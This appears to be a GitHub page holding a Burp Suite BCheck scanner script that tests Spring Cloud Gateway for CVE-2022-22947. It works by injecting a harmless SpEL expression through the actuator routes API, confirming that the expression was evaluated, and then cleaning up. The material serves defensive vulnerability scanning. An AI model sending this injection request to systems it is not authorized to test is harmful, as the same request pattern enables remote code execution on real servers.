forked from PortSwigger/BChecks
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2022-22947-spring_cloud_gateway_actuator_api_rce.bcheck
88 lines (76 loc) · 3.48 KB
/
CVE-2022-22947-spring_cloud_gateway_actuator_api_rce.bcheck
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
metadata:
language: v1-beta
name: "CVE-2022-22947 Spring Cloud Gateway Actuator API RCE"
description: "find CVE-2022-22947 Spring Cloud Gateway Actuator API RCE"
author: "timeshatter"
tags: "Spring Cloud Gateway Actuator API RCE", "CVE-2022-22947"
define:
routes = "/actuator/gateway/routes/"
poc = "{\"id\": \"vulntest\",\"filters\": [{\"name\": \"AddResponseHeader\",\"args\": {\"name\": \"Result\",\"value\": \"#{new String(\\"vuln is true\\")}\"}}],\"uri\": \"http://example.com\"}"
given host then
send request called check:
method: "GET"
path: {routes}
if {check.response.status_code} is "200" and "application/json" in {check.response} then
send request called check1:
method: "POST"
path: "/actuator/gateway/routes/vulntest"
headers: "Content-Type":"application/json"
body: {poc}
if {check1.response.status_code} is "201" then
send request called check2:
method: "POST"
path: "/actuator/gateway/refresh"
if {check2.response.status_code} is "200" then
send request called check3:
method: "GET"
path: "/actuator/gateway/routes/vulntest"
if "vuln is true" in {check3.response} then
send request:
method: "DELETE"
path: "/actuator/gateway/routes/vulntest"
send request:
method: "POST"
path: "/actuator/gateway/refresh"
report issue:
severity: high
confidence: certain
detail: "find CVE-2022-22947 Spring Cloud Gateway Actuator API RCE."
remediation: "update Spring Cloud Gateway Actuator API to last."
end if
end if
end if
end if
send request called appendcheck:
method: "GET"
appending path: "actuator/gateway/routes/"
if {appendcheck.response.status_code} is "200" and "application/json" in {appendcheck.response} then
send request called appendcheck1:
method: "POST"
appending path: "actuator/gateway/routes/appendvulntest"
headers: "Content-Type":"application/json"
body: {poc}
if {appendcheck1.response.status_code} is "201" then
send request called appendcheck2:
method: "POST"
appending path: "actuator/gateway/refresh"
if {appendcheck2.response.status_code} is "200" then
send request called appendcheck3:
method: "GET"
appending path: "actuator/gateway/routes/appendvulntest"
if "vuln is true" in {appendcheck3.response} then
send request:
method: "DELETE"
appending path: "actuator/gateway/routes/appendvulntest"
send request:
method: "POST"
appending path: "actuator/gateway/refresh"
report issue:
severity: high
confidence: certain
detail: "find CVE-2022-22947 Spring Cloud Gateway Actuator API RCE."
remediation: "update Spring Cloud Gateway Actuator API to last."
end if
end if
end if
end if